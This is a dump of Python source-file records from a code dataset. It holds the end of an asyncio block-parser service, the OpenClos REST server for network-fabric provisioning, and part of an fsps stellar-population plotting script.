stopping...')\n raise\n except Exception as error:\n logger.error('Blocks session cycle error on height {0}: {1}'.format(self.height, error))\n await self.emergency_stop_loop('Blocks session cycle error', error)\n\n except asyncio.CancelledError:\n logger.info('Parser has been stopped')\n raise\n except Exception as error:\n logger.error('Request blocks cycle error: {0}'.format(error))\n await self.emergency_stop_loop('Request blocks cycle', error)\n finally:\n self.height = self.height - self.blocks_to_check\n await asyncio.sleep(2)\n\n\ncontrols = Parser()\n\n@parser.listener('after_server_start')\ndef autostart(app, loop):\n loop.create_task(controls.start())\n logger.info('Autostart Success!')\n\n@parser.listener('after_server_stop')\ndef gentle_exit(app, loop):\n logger.info('Killing the process')\n os.kill(os.getpid(), signal.SIGKILL)\n\n# @parser.route('/start', methods=['POST'])\n# def controls_start(request):\n# loop = asyncio.get_running_loop()\n# loop.create_task(controls.start())\n# return json({\"action\": \"start\", \"status\": \"OK\"})\n\n@parser.route('/healthcheck', methods=['GET'])\ndef container_healthcheck(request):\n return json({\"action\": \"healthcheck\", \"status\": \"OK\"})\n\n\n# @parser.route('/stop', methods=['POST'])\n# def controls_stop(request):\n# try:\n# loop = asyncio.get_running_loop()\n# tasks = [t for t in asyncio.all_tasks() if t is not\n# asyncio.current_task()]\n\n# [task.cancel() for task in tasks]\n\n# logger.info('Canceling outstanding tasks')\n# asyncio.gather(*tasks)\n# loop.stop()\n# logger.info('Shutdown complete.')\n\n# except Exception as error:\n# return bad_request(error)\n\n# return json({\"action\": \"stop\", \"status\": \"OK\"})\n","sub_path":"parser/api/v1/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":17712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"392614471","text":"'''\nCreated on Sep 2, 2014\n\n@author: moloyc\n'''\n\nimport os\nimport bottle\nfrom sqlalchemy.orm import exc\nimport StringIO\nimport zipfile\nimport traceback\nimport json\nimport util\nimport logging\n\nfrom bottle import error, request, response, PluginError\nfrom exception import RestError\nfrom model import Pod, Device\nfrom dao import Dao\nfrom report import ResourceAllocationReport, L2Report, L3Report\nfrom l3Clos import L3ClosMediation\nfrom ztp import ZtpServer\nfrom jnpr.openclos.util import isSqliteUsed\n\nmoduleName = 'rest'\nlogger = None\n\nwebServerRoot = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'out')\njunosImageRoot = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'conf', 'ztp')\n\ndef loggingPlugin(callback):\n def wrapper(*args, **kwargs):\n msg = '\"{} {} {}\"'.format(request.method, request.path,\n request.environ.get('SERVER_PROTOCOL', ''))\n \n if logger.isEnabledFor(logging.DEBUG):\n logger.debug('%s REQUEST: %s' % (msg, request._get_body_string()))\n else:\n logger.info('%s REQUEST:' % (msg))\n \n try:\n responseBody = callback(*args, **kwargs)\n except bottle.HTTPError as exc:\n logger.error('HTTPError: status: %s, body: %s, exception: %s' % (exc.status, exc.body, exc.exception))\n raise\n except Exception as exc:\n logger.error('Unknown error: %s' % (exc))\n logger.info('StackTrace: %s' % (traceback.format_exc()))\n raise\n \n if logger.isEnabledFor(logging.DEBUG):\n logger.debug('%s RESPONSE %s: %s' % (msg, response.status_code, responseBody))\n else:\n logger.info('%s RESPONSE %s:' % (msg, response.status_code))\n \n return responseBody\n return wrapper\n\n\nclass OpenclosDbSessionPlugin(object):\n name = 'OpenclosDbSessionPlugin'\n\n def __init__(self, daoClass = Dao):\n self.__dao = daoClass.getInstance()\n\n def setup(self, app):\n ''' Make sure that other installed plugins don't affect the same keyword argument.'''\n for plugin in app.plugins:\n if not isinstance(plugin, OpenclosDbSessionPlugin): \n continue\n else:\n raise PluginError(\"Found another OpenclosDbSessionPlugin already installed\")\n\n def apply(self, callback, context):\n def wrapper(*args, **kwargs):\n if request.method == 'POST' or request.method == 'PUT' or request.method == 'DELETE':\n with self.__dao.getReadWriteSession() as dbSession:\n kwargs['dbSession'] = dbSession\n responseBody = callback(*args, **kwargs)\n else:\n with self.__dao.getReadSession() as dbSession:\n kwargs['dbSession'] = dbSession\n responseBody = callback(*args, **kwargs)\n return responseBody\n\n # Replace the route callback with the wrapped one.\n return wrapper\n \nclass ResourceLink():\n def __init__(self, baseUrl, path):\n self.baseUrl = baseUrl\n self.path = path\n def toDict(self):\n return {'href': self.baseUrl + self.path}\n\nclass RestServer():\n def __init__(self, conf = {}, daoClass = Dao):\n global logger\n if any(conf) == False:\n self.__conf = util.loadConfig(appName = moduleName)\n global webServerRoot\n webServerRoot = self.__conf['outputDir']\n else:\n self.__conf = conf\n logger = logging.getLogger(moduleName)\n \n self.__daoClass = daoClass\n self.__dao = daoClass.getInstance()\n self.openclosDbSessionPlugin = OpenclosDbSessionPlugin(daoClass)\n \n if 'httpServer' in self.__conf and 'ipAddr' in self.__conf['httpServer'] and self.__conf['httpServer']['ipAddr'] is not None:\n self.host = self.__conf['httpServer']['ipAddr']\n else:\n self.host = 'localhost'\n\n if 'httpServer' in self.__conf and 'port' in self.__conf['httpServer']:\n self.port = self.__conf['httpServer']['port']\n else:\n self.port = 8080\n self.baseUrl = 'http://%s:%d' % (self.host, self.port)\n\n self.report = ResourceAllocationReport(self.__conf, daoClass)\n # Create a single instance of l2Report as it holds thread-pool\n # for device connection. Don't create l2Report multiple times \n self.l2Report = L2Report(self.__conf, daoClass)\n # Create a single instance of l3Report as it holds thread-pool\n # for device connection. Don't create l3Report multiple times \n self.l3Report = L3Report(self.__conf, daoClass)\n\n \n def initRest(self):\n self.addRoutes(self.baseUrl)\n self.app = bottle.app()\n self.app.install(loggingPlugin)\n self.app.install(self.openclosDbSessionPlugin)\n logger.info('RestServer initRest() done')\n\n def _reset(self):\n \"\"\"\n Resets the state of the rest server and application\n Used for Test only\n \"\"\"\n self.app.uninstall(loggingPlugin)\n self.app.uninstall(OpenclosDbSessionPlugin)\n\n\n def start(self):\n logger.info('REST server starting at %s:%d' % (self.host, self.port))\n debugRest = False\n if logger.isEnabledFor(logging.DEBUG):\n debugRest = True\n\n if util.isSqliteUsed(self.__conf):\n bottle.run(self.app, host=self.host, port=self.port, debug=debugRest)\n else:\n bottle.run(self.app, host=self.host, port=self.port, debug=debugRest, server='paste')\n\n\n @staticmethod\n @error(400)\n def error400(error):\n bottle.response.headers['Content-Type'] = 'application/json'\n if error.exception is not None:\n return json.dumps({'errorCode': error.exception.errorId , 'errorMessage' : error.exception.errorMessage})\n else:\n return json.dumps({'errorCode': 0, 'errorMessage' : 'A generic error occurred'})\n \n def addRoutes(self, baseUrl):\n self.indexLinks = []\n\n # GET APIs\n bottle.route('/', 'GET', self.getIndex)\n bottle.route('/openclos', 'GET', self.getIndex)\n bottle.route('/openclos/conf', 'GET', self.getOpenClosConfigParams)\n bottle.route('/openclos/ip-fabrics', 'GET', self.getIpFabrics)\n bottle.route('/openclos/images/', 'GET', self.getJunosImage)\n bottle.route('/openclos/ip-fabrics/', 'GET', self.getIpFabric)\n bottle.route('/openclos/ip-fabrics//cabling-plan', 'GET', self.getCablingPlan)\n bottle.route('/openclos/ip-fabrics//ztp-configuration','GET', self.getZtpConfig)\n bottle.route('/openclos/ip-fabrics//device-configuration', 'GET', self.getDeviceConfigsInZip)\n bottle.route('/openclos/ip-fabrics//leaf-generic-configurations/', 'GET', self.getLeafGenericConfiguration)\n bottle.route('/openclos/ip-fabrics//l2-report', 'GET', self.getL2Report)\n bottle.route('/openclos/ip-fabrics//l3-report', 'GET', self.getL3Report)\n bottle.route('/openclos/ip-fabrics//devices', 'GET', self.getDevices)\n bottle.route('/openclos/ip-fabrics//devices/', 'GET', self.getDevice)\n bottle.route('/openclos/ip-fabrics//devices//config', 'GET', self.getDeviceConfig)\n\n # POST/PUT APIs\n bottle.route('/openclos/ip-fabrics', 'POST', self.createIpFabric)\n bottle.route('/openclos/ip-fabrics//cabling-plan', 'PUT', self.createCablingPlan)\n bottle.route('/openclos/ip-fabrics//device-configuration', 'PUT', self.createDeviceConfiguration)\n bottle.route('/openclos/ip-fabrics//ztp-configuration', 'PUT', self.createZtpConfiguration)\n bottle.route('/openclos/ip-fabrics/', 'PUT', self.reconfigIpFabric)\n bottle.route('/openclos/conf/', 'PUT', self.setOpenClosConfigParams)\n\n # DELETE APIs\n bottle.route('/openclos/ip-fabrics/', 'DELETE', self.deleteIpFabric)\n\n self.createLinkForConfigs()\n\n def createLinkForConfigs(self):\n # index page should show all top level URLs\n # users whould be able to drill down through navigation\n self.indexLinks.append(ResourceLink(self.baseUrl, '/openclos/ip-fabrics'))\n self.indexLinks.append(ResourceLink(self.baseUrl, '/openclos/conf'))\n \n def getIndex(self, dbSession=None):\n if 'openclos' not in bottle.request.url:\n bottle.redirect(bottle.request.url + 'openclos')\n\n jsonLinks = []\n for link in self.indexLinks:\n jsonLinks.append({'link': link.toDict()})\n\n jsonBody = \\\n {'href': bottle.request.url,\n 'links': jsonLinks\n }\n\n return jsonBody\n \n def getIpFabrics(self, dbSession):\n \n url = bottle.request.url\n ipFabricsData = {}\n listOfIpFbarics = []\n IpFabrics = self.report.getPods(dbSession)\n logger.debug(\"count of ipFabrics: %d\", len(IpFabrics))\n if not IpFabrics : \n logger.debug(\"There are no ipFabrics in the system \")\n \n for i in range(len(IpFabrics)):\n ipFabric = {}\n ipFabric['uri'] = url +'/'+ IpFabrics[i]['id']\n ipFabric['id'] = IpFabrics[i]['id']\n ipFabric['name'] = IpFabrics[i]['name']\n ipFabric['spineDeviceType'] = IpFabrics[i]['spineDeviceType']\n ipFabric['spineCount'] = IpFabrics[i]['spineCount']\n ipFabric['leafSettings'] = IpFabrics[i]['leafSettings']\n ipFabric['leafCount'] = IpFabrics[i]['leafCount']\n ipFabric['devicePassword'] = IpFabrics[i]['devicePassword']\n listOfIpFbarics.append(ipFabric)\n ipFabricsData['ipFabric'] = listOfIpFbarics\n ipFabricsData['total'] = len(listOfIpFbarics)\n ipFabricsData['uri'] = url \n return {'ipFabrics' : ipFabricsData}\n \n def getIpFabric(self, dbSession, ipFabricId, requestUrl = None):\n if requestUrl is None:\n requestUrl = bottle.request.url\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n outputDict = {} \n devices = ipFabric.devices\n outputDict['id'] = ipFabric.id\n outputDict['name'] = ipFabric.name\n outputDict['description'] = ipFabric.description \n outputDict['spineAS'] = ipFabric.spineAS\n outputDict['spineDeviceType'] = ipFabric.spineDeviceType\n outputDict['spineCount'] = ipFabric.spineCount\n outputDict['leafAS'] = ipFabric.leafAS\n outputDict['leafSettings'] = []\n for leafSetting in ipFabric.leafSettings:\n outputDict['leafSettings'].append({'deviceType': leafSetting.deviceFamily, 'junosImage': leafSetting.junosImage})\n outputDict['leafCount'] = ipFabric.leafCount\n outputDict['loopbackPrefix'] = ipFabric.loopbackPrefix \n outputDict['vlanPrefix'] = ipFabric.vlanPrefix\n outputDict['interConnectPrefix'] = ipFabric.interConnectPrefix \n outputDict['managementPrefix'] = ipFabric.managementPrefix\n outputDict['outOfBandAddressList'] = ipFabric.outOfBandAddressList\n outputDict['outOfBandGateway'] = ipFabric.outOfBandGateway \n outputDict['topologyType'] = ipFabric.topologyType\n outputDict['spineJunosImage'] = ipFabric.spineJunosImage\n outputDict['devicePassword'] = ipFabric.getCleartextPassword()\n outputDict['uri'] = requestUrl\n outputDict['devices'] = {'uri': requestUrl + '/devices', 'total':len(devices)}\n outputDict['cablingPlan'] = {'uri': requestUrl + '/cabling-plan'}\n outputDict['deviceConfiguration'] = {'uri': requestUrl + '/device-configuration'}\n outputDict['ztpConfiguration'] = {'uri': requestUrl + '/ztp-configuration'}\n outputDict['l2Report'] = {'uri': requestUrl + '/l2-report'}\n outputDict['l3Report'] = {'uri': requestUrl + '/l3-report'}\n \n logger.debug('getIpFabric: %s' % (ipFabricId))\n \n return {'ipFabric': outputDict}\n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n def getCablingPlan(self, dbSession, ipFabricId):\n \n header = bottle.request.get_header('Accept')\n logger.debug('Accept header: %s' % (header))\n\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n logger.debug('IpFabric name: %s' % (ipFabric.name))\n \n if header == 'application/json':\n cablingPlan = ipFabric.cablingPlan\n if cablingPlan is not None and cablingPlan.json is not None:\n logger.debug('CablingPlan found in DB')\n return cablingPlan.json\n else:\n raise bottle.HTTPError(404, \"IpFabric: %s exists but no CablingPlan found in DB\" % (ipFabric.id))\n \n else:\n ipFabricFolder = ipFabric.id + '-' + ipFabric.name\n fileName = os.path.join(ipFabricFolder, 'cablingPlan.dot')\n logger.debug('webServerRoot: %s, fileName: %s, exists: %s' % (webServerRoot, fileName, os.path.exists(os.path.join(webServerRoot, fileName))))\n logger.debug('Cabling file name: %s' % (fileName)) \n cablingPlan = bottle.static_file(fileName, root=webServerRoot)\n\n if isinstance(cablingPlan, bottle.HTTPError):\n raise bottle.HTTPError(404, \"IpFabric exists but no CablingPlan found. IpFabric: '%s \" % (ipFabricFolder))\n return cablingPlan\n \n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n\n def getLeafGenericConfiguration(self, dbSession, ipFabricId, deviceModel):\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is None:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n logger.debug('IpFabric name: %s, id: %s' % (ipFabric.name, ipFabricId))\n \n leafSetting = self.__dao.getLeafSetting(dbSession, ipFabricId, deviceModel)\n if leafSetting is None or leafSetting.config is None:\n raise bottle.HTTPError(404, \"IpFabric exists but no leaf generic config found, probably configuration \\\n was not created. deviceModel: %s, ipFabric name: '%s', id: '%s'\" % (deviceModel, ipFabric.name, ipFabricId))\n \n bottle.response.headers['Content-Type'] = 'application/json'\n return leafSetting.config\n\n def getDeviceConfigsInZip(self, dbSession, ipFabricId):\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is None:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n logger.debug('IpFabric name: %s' % (ipFabric.name))\n\n zippedConfigFiles = self.createZipArchive(ipFabric)\n if zippedConfigFiles is not None:\n bottle.response.headers['Content-Type'] = 'application/zip'\n return zippedConfigFiles\n else:\n raise bottle.HTTPError(404, \"IpFabric exists but no configs for devices.'%s \" % (ipFabric.name))\n\n def createZipArchive(self, ipFabric):\n\n buff = StringIO.StringIO()\n zipArchive = zipfile.ZipFile(buff, mode='w')\n for device in ipFabric.devices:\n fileName = device.id + '__' + device.name + '.conf'\n if device.config is not None:\n zipArchive.writestr(fileName, device.config.config)\n \n if ipFabric.leafSettings is not None:\n for leafSetting in ipFabric.leafSettings:\n if leafSetting.config is not None:\n zipArchive.writestr(leafSetting.deviceFamily + '.conf', leafSetting.config)\n \n zipArchive.close()\n logger.debug('zip file content:\\n' + str(zipArchive.namelist()))\n return buff.getvalue()\n\n def getDevices(self, dbSession, ipFabricId):\n \n devices = {}\n listOfDevices = []\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n for device in ipFabric.devices:\n outputDict = {}\n outputDict['id'] = device.id\n outputDict['name'] = device.name\n outputDict['role'] = device.role\n outputDict['family'] = device.family\n outputDict['macAddress'] = device.macAddress\n outputDict['managementIp'] = device.managementIp\n outputDict['serialNumber'] = device.serialNumber\n outputDict['deployStatus'] = device.deployStatus\n outputDict['configStatus'] = device.configStatus\n outputDict['l2Status'] = device.l2Status\n outputDict['l3Status'] = device.l3Status\n outputDict['uri'] = bottle.request.url + '/' +device.id\n listOfDevices.append(outputDict)\n devices['device'] = listOfDevices\n devices['uri'] = bottle.request.url\n devices['total'] = len(ipFabric.devices)\n return {'devices' : devices}\n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n def getDevice(self, dbSession, ipFabricId, deviceId):\n \n device = self.isDeviceExists(dbSession, ipFabricId, deviceId)\n #ipFabricUri is constructed from url\n url = bottle.request.url\n uri = url.split(\"/\")\n uri.pop()\n uri.pop()\n ipFbaricUri = \"/\".join(uri)\n \n if device is not None:\n outputDict = {}\n outputDict['id'] = device.id\n outputDict['name'] = device.name\n outputDict['role'] = device.role\n outputDict['family'] = device.family\n outputDict['username'] = device.username\n outputDict['password'] = device.getCleartextPassword()\n outputDict['macAddress'] = device.macAddress\n outputDict['managementIp'] = device.managementIp\n outputDict['asn'] = device.asn\n outputDict['configStatus'] = device.configStatus\n outputDict['configStatusReason'] = device.configStatusReason\n outputDict['l2Status'] = device.l2Status\n outputDict['l2StatusReason'] = device.l2StatusReason\n outputDict['l3Status'] = device.l3Status\n outputDict['l3StatusReason'] = device.l3StatusReason\n outputDict['serialNumber'] = device.serialNumber\n outputDict['deployStatus'] = device.deployStatus\n outputDict['uri'] = bottle.request.url\n outputDict['pod'] = {'uri': ipFbaricUri }\n outputDict['config'] = {'uri': bottle.request.url + '/config' }\n \n return {'device': outputDict}\n else:\n raise bottle.HTTPError(404, \"device with id: %s not found\" % (deviceId)) \n \n \n def getDeviceConfig(self, dbSession, ipFabricId, deviceId):\n \n device = self.isDeviceExists(dbSession, ipFabricId, deviceId)\n if device is None:\n raise bottle.HTTPError(404, \"No device found with ipFabricId: '%s', deviceId: '%s'\" % (ipFabricId, deviceId))\n\n config = device.config\n if config is None:\n raise bottle.HTTPError(404, \"Device exists but no config found, probably fabric script is not ran. ipFabricId: '%s', deviceId: '%s'\" % (ipFabricId, deviceId))\n \n bottle.response.headers['Content-Type'] = 'application/json'\n return config.config\n\n \n def getZtpConfig(self, dbSession, ipFabricId):\n \n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n logger.debug('Fabric name: %s' % (ipFabric.name))\n \n ipFabricFolder = ipFabric.id + '-' + ipFabric.name\n fileName = os.path.join(ipFabricFolder, \"dhcpd.conf\")\n logger.debug('webServerRoot: %s, fileName: %s, exists: %s' % (webServerRoot, fileName, os.path.exists(os.path.join(webServerRoot, fileName)))) \n ztpConf = bottle.static_file(fileName, root=webServerRoot)\n if isinstance(ztpConf, bottle.HTTPError):\n raise bottle.HTTPError(404, \"Pod exists but no ztp Config found. Pod name: '%s \" % (ipFabric.name))\n return ztpConf\n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n\n def isDeviceExists(self, dbSession, ipFabricId, deviceId):\n try:\n device = dbSession.query(Device).join(Pod).filter(Device.id == deviceId).filter(Pod.id == ipFabricId).one()\n return device\n except (exc.NoResultFound):\n raise bottle.HTTPError(404, \"No device found with ipFabricId: '%s', deviceId: '%s'\" % (ipFabricId, deviceId))\n\n def getJunosImage(self, dbSession, junosImageName):\n \n fileName = os.path.join(junosImageRoot, junosImageName)\n logger.debug('junosImageRoot: %s, image: %s, exists: %s' % (junosImageRoot, junosImageName, os.path.exists(fileName)))\n\n config = bottle.static_file(junosImageName, root=junosImageRoot)\n if isinstance(config, bottle.HTTPError):\n raise bottle.HTTPError(404, \"Junos image file not found. name: '%s'\" % (junosImageName))\n return config\n \n def getOpenClosConfigParams(self, dbSession):\n supportedDevices = []\n for device in self.__conf['deviceFamily']:\n port = util.getPortNamesForDeviceFamily(device, self.__conf['deviceFamily'])\n deviceDetail = {}\n if len(port['uplinkPorts']) > 0:\n deviceDetail['family'] = device\n deviceDetail['uplinkStart'] = port['uplinkPorts'][0]\n deviceDetail['uplinkEnd'] = port['uplinkPorts'][len(port['uplinkPorts'])-1]\n deviceDetail['role'] = 'leaf'\n \n if len(port['downlinkPorts']) > 0:\n deviceDetail['downlinkStart'] = port['uplinkPorts'][0]\n deviceDetail['downlinkEnd'] = port['uplinkPorts'][len(port['uplinkPorts'])-1]\n deviceDetail['role'] = 'leaf'\n \n if len(port['uplinkPorts'])==0 and len(port['downlinkPorts']) == 0:\n if device == 'qfx5100-24q-2p':\n deviceDetail['role'] = 'spine'\n deviceDetail['family'] = device\n deviceDetail['downlinkStart'] = port['ports'][0]\n deviceDetail['downlinkEnd'] = port['ports'][len(port['ports'])-1]\n deviceDetail['uplinkStart'] = ''\n deviceDetail['uplinkEnd'] = ''\n \n supportedDevices.append(deviceDetail)\n \n confValues = {}\n confValues.update({'dbUrl': self.__conf['dbUrl']})\n confValues.update({'supportedDevices' : supportedDevices })\n confValues.update({'dotColors': self.__conf['DOT']['colors'] })\n confValues.update({'httpServer' : self.__conf['httpServer']})\n confValues.update({'snmpTrap' : self.__conf['snmpTrap']})\n\n return {'OpenClosConf' : confValues }\n \n def createIpFabric(self, dbSession): \n if bottle.request.json is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"No json in request object\"))\n else:\n pod = bottle.request.json.get('ipFabric')\n if pod is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"POST body can not be empty\"))\n\n l3ClosMediation = L3ClosMediation(self.__conf, self.__daoClass)\n ipFabric = self.getPodFromDict(pod)\n ipFabricName = ipFabric.pop('name')\n fabricDevices = self.getDevDictFromDict(pod)\n try:\n fabric = l3ClosMediation.createPod(ipFabricName, ipFabric, fabricDevices)\n url = bottle.request.url + '/' + fabric.id\n ipFabric = self.getIpFabric(dbSession, fabric.id, url)\n except ValueError as e:\n logger.debug('StackTrace: %s' % (traceback.format_exc()))\n raise bottle.HTTPError(400, exception = RestError(0, e.message))\n bottle.response.set_header('Location', url)\n bottle.response.status = 201\n\n return ipFabric\n \n def createCablingPlan(self, dbSession, ipFabricId):\n try:\n l3ClosMediation = L3ClosMediation(self.__conf, self.__daoClass)\n if l3ClosMediation.createCablingPlan(ipFabricId) is True:\n return bottle.HTTPResponse(status=200)\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id[%s] not found\" % (ipFabricId))\n\n def createDeviceConfiguration(self, dbSession, ipFabricId):\n try:\n l3ClosMediation = L3ClosMediation(self.__conf, self.__daoClass)\n if l3ClosMediation.createDeviceConfig(ipFabricId) is True:\n return bottle.HTTPResponse(status=200)\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id[%s] not found\" % (ipFabricId))\n \n def createZtpConfiguration(self, dbSession, ipFabricId):\n try:\n ZtpServer.createPodSpecificDhcpConfFile(self, ipFabricId)\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id[%s] not found\" % (ipFabricId))\n\n def reconfigIpFabric(self, dbSession, ipFabricId):\n if bottle.request.json is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"No json in request object\"))\n else:\n inPod = bottle.request.json.get('ipFabric')\n if inPod is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"POST body can not be empty\"))\n\n l3ClosMediation = L3ClosMediation(self.__conf, self.__daoClass)\n ipFabric = self.getPodFromDict(inPod)\n #ipFabric['id'] = ipFabricId\n #ipFabric['uri'] = bottle.request.url\n fabricDevices = self.getDevDictFromDict(inPod)\n # Pass the ipFabric and fabricDevices dictionaries to config/update API, then return\n try:\n updatedFabric = l3ClosMediation.updatePod(ipFabricId, ipFabric, fabricDevices)\n url = bottle.request.url + '/' + updatedFabric.id\n return self.getIpFabric(dbSession, ipFabricId, url)\n except ValueError as e:\n raise bottle.HTTPError(400, exception = RestError(0, e.message))\n \n def setOpenClosConfigParams(self):\n return bottle.HTTPResponse(status=200)\n \n def deleteIpFabric(self, dbSession, ipFabricId):\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n self.__dao.deleteObject(dbSession, ipFabric)\n util.deleteOutFolder(self.__conf, ipFabric)\n logger.debug(\"IpFabric with id: %s deleted\" % (ipFabricId))\n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n return bottle.HTTPResponse(status=204)\n\n def getPodFromDict(self, podDict):\n ipFabric = {}\n '''\n # Need to revisit later on to make thing works as below.\n podDict.pop('devices')\n ipFabric = Pod(**inPod)\n '''\n if podDict is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"Invalid value in POST/PUT body.\"))\n ipFabric['name'] = podDict.get('name')\n ipFabric['fabricDeviceType'] = podDict.get('fabricDeviceType')\n ipFabric['fabricDeviceCount'] = podDict.get('fabricDeviceCount')\n ipFabric['spineCount'] = podDict.get('spineCount')\n ipFabric['spineDeviceType'] = podDict.get('spineDeviceType')\n ipFabric['leafCount'] = podDict.get('leafCount')\n ipFabric['leafSettings'] = podDict.get('leafSettings')\n ipFabric['leafUplinkcountMustBeUp'] = podDict.get('leafUplinkcountMustBeUp')\n ipFabric['interConnectPrefix'] = podDict.get('interConnectPrefix')\n ipFabric['vlanPrefix'] = podDict.get('vlanPrefix')\n ipFabric['loopbackPrefix'] = podDict.get('loopbackPrefix')\n ipFabric['spineAS'] = podDict.get('spineAS')\n ipFabric['leafAS'] = podDict.get('leafAS')\n ipFabric['topologyType'] = podDict.get('topologyType')\n ipFabric['outOfBandAddressList'] = podDict.get('outOfBandAddressList')\n ipFabric['outOfBandGateway'] = podDict.get('outOfBandGateway')\n ipFabric['managementPrefix'] = podDict.get('managementPrefix')\n ipFabric['hostOrVmCountPerLeaf'] = podDict.get('hostOrVmCountPerLeaf')\n ipFabric['description'] = podDict.get('description')\n ipFabric['devicePassword'] = podDict.get('devicePassword')\n\n return ipFabric\n\n\n def getDevDictFromDict(self, podDict):\n if podDict is not None:\n devices = podDict.get('devices')\n else:\n raise bottle.HTTPError(400, exception = RestError(0, \"Invalid value in POST body.\"))\n\n fabricDevices = {}\n spines = []\n leaves = []\n for device in devices:\n temp = {}\n temp['name'] = device.get('name')\n temp['macAddress'] = device.get('macAddress')\n temp['role'] = device.get('role')\n temp['username'] = device.get('username')\n temp['password'] = device.get('password')\n temp['family'] = device.get('family')\n temp['serialNumber'] = device.get('serialNumber')\n temp['deployStatus'] = device.get('deployStatus')\n if temp['role'] == 'spine':\n spines.append(temp)\n elif temp['role'] == 'leaf':\n leaves.append(temp)\n else:\n raise bottle.HTTPError(400, exception = RestError(0, \"Unexpected role value in device inventory list\"))\n fabricDevices['spines'] = spines\n fabricDevices['leafs'] = leaves\n\n return fabricDevices\n\n def getL2Report(self, dbSession, ipFabricId):\n try:\n cached = bottle.request.query.get('cached', '1')\n if cached == '1':\n cachedData = True\n else:\n cachedData = False\n bottle.response.headers['Content-Type'] = 'application/json'\n return self.l2Report.generateReport(ipFabricId, cachedData)\n\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id: %s not found\" % (ipFabricId))\n \n def getL3Report(self, dbSession, ipFabricId):\n try:\n cached = bottle.request.query.get('cached', '1')\n if cached == '1':\n cachedData = True\n else:\n cachedData = False\n bottle.response.headers['Content-Type'] = 'application/json'\n return self.l3Report.generateReport(ipFabricId, cachedData)\n\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id: %s not found\" % (ipFabricId))\n\ndef main():\n restServer = RestServer()\n restServer.initRest()\n restServer.start()\n \nif __name__ == '__main__':\n main()","sub_path":"jnpr/openclos/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":31493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"68149015","text":"import os\nimport numpy as np\nimport fsps\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom astropy.io import ascii\n\nsp = fsps.StellarPopulation(compute_vega_mags=False, zcontinuous=1,\n sfh=0, logzsol=0.0, dust_type=2, dust2=0.0)\nsp_dust = fsps.StellarPopulation(compute_vega_mags=False, zcontinuous=1,\n sfh=0, logzsol=0.0, dust_type=2, dust2=0.4)\nsp_must = fsps.StellarPopulation(compute_vega_mags=False, zcontinuous=1,\n sfh=0, logzsol=0.0, dust_type=2, dust2=0.8)\n\nbands = np.array(['wfc3_uvis_f475w','wfc3_uvis_f814w','wfc3_ir_f160w'])\n\nphottable = 'Photometry/coarse_final/atest.txt'\ncatalog = ascii.read(phottable)\n \nfilename = 'fsps_example.pdf'\n\nwith PdfPages(filename) as pdf:\n fig = plt.figure()\n\n t = np.array([0.004,0.006,0.007,0.01,0.02,0.04,0.06,0.08,0.1,0.2,0.4])\n colors = ['violet', 'indigo', 'blue', 'green', 'cyan', 'orange', 'red', 'darkviolet', 'midnightblue', 'darkgoldenrod', 'chocolate']\n for i in range(0,len(t)):\n wave, spec = sp.get_spectrum(tage=t[i])\n plt.plot(wave,spec,color=colors[i], label=str(int(t[i]*1e3))+' Myr')\n\n plt.xlim(3000,10000)\n plt.ylim(1e-15,1e-13)\n plt.xscale(\"log\", nonposx='clip')\n plt.yscale(\"log\", nonposy='clip')\n plt.xlabel('Wavelength [Angstroms]')\n plt.ylabel('Luminosity')\n plt.legend(loc='lower right', prop={'size': 10}, framealpha=0.1)\n pdf.savefig()\n plt.close()\n\n for j in range(0,len(catalog)):\n\n mags = np.zeros([len(t),len(bands)])\n mags_dust = np.zeros([len(t),len(bands)])\n mags_must = np.zeros([len(t),len(bands)])\n for i in range(0,len(mags)):\n mags[i] = sp.get_mags(tage=t[i], bands=bands, redshift=catalog['z'][j])\n mags_dust[i] = sp_dust.get_mags(tage=t[i], bands=bands, redshift=catalog['z'][j])\n mags_must[i] = sp_must.get_mags(tage=t[i], bands=bands, redshift=catalog['z'][j])\n fig = plt.figure()\n\n m814 = -2.5*np.log10(catalog['f_814'][j]*1e-9)\n mass = 10**((m814 - mags[:,1])/(-2.5))\n mass_dust = 10**((m814 - mags_dust[:,1])/(-2.5))\n mass_must = 10**((m814 - mags_must[:,1])/(-2.5))\n \n plt.scatter(mags[:,1]-mags[:,2], mags[:,0]-mags[:,1], color='blue', marker='o', label='no dust')\n for i in range(0,len(mags)):\n plt.text(mags[i,1]-mags[i,2], mags[i,0]-mags[i,1],str(int(t[i]*1e3)))\n 